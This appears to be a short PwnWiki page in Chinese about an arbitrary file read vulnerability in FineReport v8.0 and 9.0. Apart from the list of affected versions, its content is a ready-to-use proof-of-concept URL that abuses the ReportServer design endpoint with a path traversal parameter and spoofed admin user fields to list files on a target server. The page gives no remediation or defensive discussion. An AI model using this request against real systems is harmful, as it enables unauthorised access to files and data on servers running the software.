FineReport v8.0 - 9.0 任意文件读取漏洞

From PwnWiki
This page is a translated version of the page FineReport v8.0 - 9.0 任意文件讀取漏洞 and the translation is 100% complete.
Other languages:
Chinese • ‎中文(中国大陆)‎

漏洞影响

FineReport v8.0
FineReport v9.0

POC

http://<target>/WebReport/ReportServer?op=fs_remote_design&cmd=design_list_file&file_path=..&currentUserName=admin&currentUserId=1&isWebReport=true
Retrieved from "https://pwnwiki.com/index.php?title=FineReport_v8.0_-_9.0_任意文件讀取漏洞/zh-cn&oldid=4919"